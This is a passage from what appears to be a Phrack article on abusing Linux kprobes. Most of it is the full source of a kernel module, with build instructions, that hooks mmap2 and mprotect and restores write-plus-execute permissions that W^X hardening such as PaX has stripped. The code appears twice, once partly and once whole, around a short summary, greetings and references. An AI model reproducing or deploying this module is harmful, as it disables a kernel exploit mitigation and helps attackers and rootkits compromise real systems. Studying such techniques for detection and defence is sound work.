VM_MAYEXEC); vma->vm_flags |= (VM_WRITE | VM_MAYWRITE); up_write(¤t->mm->mmap_sem); break; } out: return 0; } asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long fd, unsigned long pgoff) { struct file *file = NULL; printk("In sys_mmap2\n"); do_mmap_data.len = len; /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */ /* This is the easiest scenario */ /* because we know the mmap addr */ if (flags & MAP_FIXED) { printk("MAP_FIXED\n"); do_mmap_data.addr = addr; if ((prot & PROT_EXEC) && (prot & PROT_WRITE)) do_mmap_data.mmap_prot_state = MMAP_DIRTY; else do_mmap_data.mmap_prot_state = MMAP_CLEAN; goto out; } flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE); if (!(flags & MAP_ANONYMOUS)) { file = fget(fd); if (!file) goto out; } /* mimick do_mmap_pgoff to get the linear range */ down_write(¤t->mm->mmap_sem); if (file) { if (!file->f_op || !file->f_op->mmap) goto sem_out; } if (!len) goto sem_out; len = PAGE_ALIGN(len); if (!len || len > TASK_SIZE) goto sem_out; if ((pgoff + (len >> PAGE_SHIFT)) < pgoff) goto sem_out; /* when the real sys_mmap2/do_mmap_pgoff are called * they will get the next linear range * which will be at do_mmap_data.addr - do_mmap_data.len * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() */ printk("get_unmapped_area call\n"); addr = _get_unmapped_area(file, addr, len, 0, flags); printk("addr: 0x%lx\n", addr); do_mmap_data.addr = addr; if ((prot & PROT_EXEC) && (prot & PROT_WRITE)) do_mmap_data.mmap_prot_state = MMAP_DIRTY; else do_mmap_data.mmap_prot_state = MMAP_CLEAN; sem_out: up_write(¤t->mm->mmap_sem); out: jprobe_return(); return 0; } static struct jprobe sys_mmap2_jprobe = { .entry = (kprobe_opcode_t *)kp_sys_mmap2 }; static struct jprobe sys_mprotect_jprobe = { .entry = (kprobe_opcode_t *)kp_sys_mprotect }; static struct kretprobe mprotect_kretprobe = { .handler = rp_mprotect, .maxactive = 1 // this code isn't really SMP reliable }; static struct kretprobe mmap_kretprobe = { .handler = rp_mmap, .maxactive = 1 // this code isn't really SMP reliable }; void exit_module(void) { unregister_jprobe(&sys_mmap2_jprobe); unregister_jprobe(&sys_mprotect_jprobe); unregister_kretprobe(&mprotect_kretprobe); unregister_kretprobe(&mmap_kretprobe); } int init_module(void) { int j = 0, k = 0; _get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown"); sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2"); /* Register our jprobes */ if (register_jprobe(&sys_mmap2_jprobe) < 0) goto jfail; j++; sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect"); if (register_jprobe(&sys_mprotect_jprobe) < 0) goto jfail; mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect"); /* Register our kretprobes */ if (register_kretprobe(&mprotect_kretprobe) < 0) goto kfail; k++; mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2"); if (register_kretprobe(&mmap_kretprobe) < 0) goto kfail; return 0; jfail: printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect")); kfail: printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap")); return -1; } module_exit(exit_module); --- end of code --- ---[ 4 - Notes on rootkit detection for kprobes If a kernel rootkit is designed soley using kprobes and properly hides itself from the kprobe entries in sysfs, then a rootkit detection program can still easily detect what kernel functions have been hooked. I will leave this obvious solution to anyone interested in adding this feature to their detectors but the answer lies in this paper as well as the kprobe documentation. ---[ 5 - Summing it all up We have seen that the kprobe interface, which is primarily implemented for kernel debugging can be used to instrument the kernel in some interesting ways. We have explored kprobes strengths, weaknesses, and provided several examples of weakening the kernel by patching it using jprobe and kretprobe techniques. We also went over some ideas for implementing a more hacker friendly kretprobe implementation (Although we did not provide one). It is also important to mention to people who are engineering security code that kprobes can also be used to debug kernel code, as well as install simple patches for hardening the kernel. But phrack isn't about that, so patches to harden the kernel were not included -- just know that it is possible. ---[ 6 - Greetz kad - thanks for encouraging me to write this, and being cool guy with priceless skills and good advice. Silvio - My initial inspiration for kernel and ELF hacking all started with you. You've been a good friend and mentor, many many thanks. chrak - My long time friend and occasional coding partner. 13yrs ago this guy helped me write my first backdoor program for Linux. nynex - I owe you for hosting my stuff and being a good friend. mayhem - For writing some really cool ELF code and being an inspiration. grugq - Your original AF work has been an inspiration as well. halfdead - For knowing everything about the universe and our realm *literally* jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word. All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh. #bitlackeys on EFnet, a small and strange little channel with people whom I've been friends with for years. #formal on a secret network with extremely smart people and good conversation. RuxCon folk are pretty much all awesome too, thanks. ---[ 7 - References Please note that I did not use any references other than code and official documentation for this paper, but the following papers are quite relevant and since I have read them (along with many other great papers) they all play a role in my collective knowledge of kernel malware and rootkit exploration. [1] kad - Handling interrupt descriptor table for fun and profit http://www.phrack.org/issues.html?issue=59&id=4#article [2] Halfdead - Mystifying the debugger for ultimate stealthness http://www.phrack.org/issues.html?issue=65&id=8#article [3] Silvio - Kernel function hijacking (Function trampolines) http://vxheavens.com/lib/vsc08.html ---[ 8 - Code /* Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax. From the ElfMaster, 2010. Makefile: obj-m += w_plus_x.o MODULES = w_plus_x.ko all: clean $(MODULES) $(MODULES): make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/kprobes.h> #include <linux/mm.h> #include <linux/fs.h> #include <linux/file.h> #define PROT_READ 0x1 /* Page can be read. */ #define PROT_WRITE 0x2 /* Page can be written. */ #define PROT_EXEC 0x4 /* Page can be executed. */ #define PROT_NONE 0x0 /* Page can not be accessed. */ #define MAP_FIXED 0x10 #define MAP_ANONYMOUS 0x20 /* don't use a file */ #define MAP_GROWSDOWN 0x0100 /* stack-like segment */ #define MAP_DENYWRITE 0x0800 /* ETXTBSY */ #define MAP_EXECUTABLE 0x1000 /* mark it as an executable */ /* * It is preferable to write a script that gets * kallsyms_lookup_name() from System.map and then * passes it as a module parameter, but in this example * we just look it up and assign it our selves, so * make sure to change the address. */ unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags); static struct { int assign_wx; unsigned long start; size_t len; long prot; } mprotect; MODULE_LICENSE("GPL"); asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot) { struct vm_area_struct *vma = current->mm->mmap; mprotect.assign_wx = 0; mprotect.start = start; mprotect.prot = prot; /* This doesn't concern us */ if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE)) goto out; down_write(¤t->mm->mmap_sem); /* Get vma for start memory area */ vma = find_vma(current->mm, start); if (!vma) goto free_sem; if (prot & (PROT_WRITE|PROT_EXEC)) { mprotect.assign_wx++; goto free_sem; } if (prot & PROT_WRITE) { mprotect.assign_wx++; goto free_sem; } if (prot & PROT_EXEC) { mprotect.assign_wx++; goto free_sem; } free_sem: up_write(¤t->mm->mmap_sem); out: jprobe_return(); return 0; } /* before the following function is executed, a W^X patch such as PaX mprotect/mmap restrictions, will have code such as: if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC) vm_flags &= ~(VM_EXEC | VM_MAYEXEC); else vm_flags &= ~(VM_WRITE | VM_MAYWRITE); But our return probe gets the last say in the matter. mprotect will return like it failed (With a positive value) but the VMA's or memory maps will be both write+execute, just make sure that you don't error checking then exit if mprotect or mmap fail because they will return failed values. */ static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs) { struct vm_area_struct *vma; if (!mprotect.assign_wx) goto out; down_write(¤t->mm->mmap_sem); /* Get vma for start memory area */ vma = find_vma(current->mm, mprotect.start); if (!vma) goto sem_out; if (mprotect.prot & PROT_EXEC) { vma->vm_flags |= VM_MAYEXEC; vma->vm_flags |= VM_EXEC; } if (mprotect.prot & PROT_WRITE) { vma->vm_flags |= VM_MAYWRITE; vma->vm_flags |= VM_WRITE; } sem_out: up_write(¤t->mm->mmap_sem); out: return 0; } struct { unsigned long addr; #define MMAP_CLEAN 0 #define MMAP_DIRTY 1 int mmap_prot_state; unsigned int len; } do_mmap_data; /* Return probe code for sys_mmap2 */ static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs) { struct vm_area_struct *vma = current->mm->mmap; /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */ if (do_mmap_data.addr - regs->eax == do_mmap_data.len) do_mmap_data.addr = regs->eax; else goto out; // pretty unlikely switch(do_mmap_data.mmap_prot_state) { case MMAP_CLEAN: break; case MMAP_DIRTY: // lets undo the work of the W^X patch :) down_write(¤t->mm->mmap_sem); vma = find_vma(current->mm, do_mmap_data.addr); if (!vma) break; printk("Found vma's and setting all writes and exec possibilities\n"); vma->vm_flags |= (VM_EXEC | VM_MAYEXEC); vma->vm_flags |= (VM_WRITE | VM_MAYWRITE); up_write(¤t->mm->mmap_sem); break; } out: return 0; } asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long fd, unsigned long pgoff) { struct file *file = NULL; printk("In sys_mmap2\n"); do_mmap_data.len = len; /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */ /* This is the easiest scenario */ /* because we know the mmap addr */ if (flags & MAP_FIXED) { printk("MAP_FIXED\n"); do_mmap_data.addr = addr; if ((prot & PROT_EXEC) && (prot & PROT_WRITE)) do_mmap_data.mmap_prot_state = MMAP_DIRTY; else do_mmap_data.mmap_prot_state = MMAP_CLEAN; goto out; } flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE); if (!(flags & MAP_ANONYMOUS)) { file = fget(fd); if (!file) goto out; } /* mimick do_mmap_pgoff to get the linear range */ down_write(¤t->mm->mmap_sem); if (file) { if (!file->f_op || !file->f_op->mmap) goto sem_out; } if (!len) goto sem_out; len = PAGE_ALIGN(len); if (!len || len > TASK_SIZE) goto sem_out; if ((pgoff + (len >> PAGE_SHIFT)) < pgoff) goto sem_out; /* when the real sys_mmap2/do_mmap_pgoff are called * they will get the next linear range * which will be at do_mmap_data.addr - do_mmap_data.len * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() */ printk("get_unmapped_area call\n"); addr = _get_unmapped_area(file, addr, len, 0, flags); printk("addr: 0x%lx\n", addr); do_mmap_data.addr = addr; if ((prot & PROT_EXEC) && (prot & PROT_WRITE)) do_mmap_data.mmap_prot_state = MMAP_DIRTY; else do_mmap_data.mmap_prot_state = MMAP_CLEAN; sem_out: up_write(¤t->mm->mmap_sem); out: jprobe_return(); return 0; } static struct jprobe sys_mmap2_jprobe = { .entry = (kprobe_opcode_t *)kp_sys_mmap2 }; static struct jprobe sys_mprotect_jprobe = { .entry = (kprobe_opcode_t *)kp_sys_mprotect }; static struct kretprobe mprotect_kretprobe = { .handler = rp_mprotect, .maxactive = 1 // this code isn't really SMP reliable }; static struct kretprobe mmap_kretprobe = { .handler = rp_mmap, .maxactive = 1 // this code isn't really SMP reliable }; void exit_module(void) { unregister_jprobe(&sys_mmap2_jprobe); unregister_jprobe(&sys_mprotect_jprobe); unregister_kretprobe(&mprotect_kretprobe); unregister_kretprobe(&mmap_kretprobe); } int init_module(void) { int j = 0, k = 0; _get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown"); sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2"); /* Register our jprobes */ if (register_jprobe(&sys_mmap2_jprobe) < 0) goto jfail; j++; sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect"); if (register_jprobe(&sys_mprotect_jprobe) < 0) goto jfail; mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect"); /* Register our kretprobes */ if (register_kretprobe(&mprotect_kretprobe) < 0) goto kfail; k++; mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2"); if (register_kretprobe(&mmap_kretprobe) < 0) goto kfail; return 0; jfail: printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect")); kfail: printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap")); return -1; } module_exit(exit_module); ----EOF----